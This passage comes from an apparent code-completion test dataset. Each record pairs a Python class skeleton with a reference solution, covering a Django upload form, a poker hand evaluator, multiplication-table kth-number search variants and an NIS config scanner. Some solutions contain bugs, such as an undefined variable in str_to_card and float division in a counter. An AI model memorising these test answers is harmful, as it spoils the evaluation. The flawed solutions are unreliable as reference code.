larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000259", "length_bytes": 39361, "license_type": "permissive", "methods": [{"docstring": "Check for file name, size limits and whether they are readable", "name": "clean_file_field", "signature": "def clean_file_field(self)"}, {"docstring": "Upload the files", "name": "perform_action", "signature": "def perform_action(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001029", "prompt": "Implement the Python class `UploadFilesForm` described below.\n\nClass description:\nForm for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\n\nMethod signatures and docstrings:\n- def clean_file_field(self): Check for file name, size limits and whether they are readable\n- def perform_action(self): Upload the files", "prompted_full_text": "Implement the Python class `UploadFilesForm` described below.\n\nClass description:\nForm for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\n\nMethod signatures and docstrings:\n- def clean_file_field(self): Check for file name, size limits and whether they are readable\n- def perform_action(self): Upload the files\n\n<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "revision_id": "e7c8ed0b07a4c9a1b4007f6089f59aafa6a3ac57", "skeleton": "<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n", "source": "the_stack_v2_python_sparse", "source_path": "physionet-django/project/forms.py", "source_repo": "tompollard/physionet-build", "split": "test", "star_events_count": 0} {"blob_id": "0065df9a1007f8b9f414d5b55e3390e3d54092bf", "bodies": ["if isinstance(card, basestring):\n return card\nreturn card.__str__()", "if isinstance(card_string, Card):\n return card\nrank_str = card_string[0].lower()\nsuit_str = card_string[1].lower()\nrank = 2\nsuit = 1\nif rank_str == 't':\n rank = 10\nelif rank_str == 'j':\n rank = 11\nelif rank_str == 'q':\n rank = 12\nelif rank_str == 'k':\n rank = 13\nelif rank_str == 'a':\n rank = 14\nif suit_str == 's':\n suit = 1\nelif suit_str == 'h':\n suit = 2\nelif suit_str == 'd':\n suit = 3\nelif suit_str == 'c':\n suit = 4\nreturn Card(rank, suit)", "if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\nelif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\nelse:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\nreturn (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])"], "bodies_text": "<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "class_docstring": "", "class_name": "HandEvaluator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000260", "length_bytes": 6777, "license_type": "no_license", "methods": [{"docstring": "Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!", "name": "card_to_str", "signature": "def card_to_str(card)"}, {"docstring": "Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!", "name": "str_to_card", "signature": "def str_to_card(card_string)"}, {"docstring": "Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate", "name": "evaluate_hand", "signature": "def evaluate_hand(hand, board=[], iterations=1000)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000115", "prompt": "Implement the Python class `HandEvaluator` described below.\n\nClass description:\nImplement the HandEvaluator class.\n\nMethod signatures and docstrings:\n- def card_to_str(card): Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\n- def str_to_card(card_string): Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\n- def evaluate_hand(hand, board=[], iterations=1000): Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate", "prompted_full_text": "Implement the Python class `HandEvaluator` described below.\n\nClass description:\nImplement the HandEvaluator class.\n\nMethod signatures and docstrings:\n- def card_to_str(card): Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\n- def str_to_card(card_string): Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\n- def evaluate_hand(hand, board=[], iterations=1000): Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\n\n<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "revision_id": "72dc7adac6f15cb070c3641ca9de34fcf67bcf0a", "skeleton": "<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class HandEvaluator:\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n if isinstance(card, basestring):\n return card\n return card.__str__()\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n", "source": "the_stack_v2_python_sparse", "source_path": "pokerbots/player/hand_evaluator.py", "source_repo": "aliang/notpoker", "split": "test", "star_events_count": 2} {"blob_id": "e7c1fb90c281338f6e931ca65df2a9696017fd46", "bodies": ["import bisect\n\ndef Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\nstart, end = (1, m * n)\nresult = []\ndicts = {}\nwhile start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\na = sorted(result)\npos = bisect.bisect_right(a, k)\nprint(dicts)\nreturn dicts[a[pos]]", "def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\nstart, end = (1, m * n)\nwhile start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\nreturn start", "def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\nif m > n:\n m, n = (n, m)\nlo, hi = (1, m * n)\nwhile lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\nreturn lo"], "bodies_text": "<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000261", "length_bytes": 3475, "license_type": "no_license", "methods": [{"docstring": ":type m: int :type n: int :type k: int :rtype: int", "name": "findKthNumber", "signature": "def findKthNumber(self, m, n, k)"}, {"docstring": ":type m: int :type n: int :type k: int :rtype: int 1858ms", "name": "findKthNumber_1", "signature": "def findKthNumber_1(self, m, n, k)"}, {"docstring": ":type m: int :type n: int :type k: int :rtype: int 477ms", "name": "findKthNumber_2", "signature": "def findKthNumber_2(self, m, n, k)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findKthNumber(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int\n- def findKthNumber_1(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 1858ms\n- def findKthNumber_2(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 477ms", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findKthNumber(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int\n- def findKthNumber_1(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 1858ms\n- def findKthNumber_2(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 477ms\n\n<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "revision_id": "679a2b246b8b6bb7fc55ed1c8096d3047d6d4461", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n", "source": "the_stack_v2_python_sparse", "source_path": "KthSmallestNumberInMultiplicationTable_HARD_668.py", "source_repo": "953250587/leetcode-python", "split": "test", "star_events_count": 2} {"blob_id": "fd3c807ef0ff222581fdbf60df0262fdd147b303", "bodies": ["if not os.path.isfile(YPBIND_CONF_FILE):\n return False\nwith open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\nfor line in lines:\n if not line.startswith('#'):\n return True\nreturn False", "if not os.path.isdir(YPSERV_DIR_PATH):\n return False\nreturn any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))", "pkgs = []\nif self.server_has_non_default_configuration():\n pkgs.append('ypserv')\nif self.client_has_non_default_configuration():\n pkgs.append('ypbind')\napi.produce(NISConfig(nis_not_default_conf=pkgs))"], "bodies_text": "<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "class_docstring": "Helper library for NISScan actor.", "class_name": "NISScanLibrary", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n 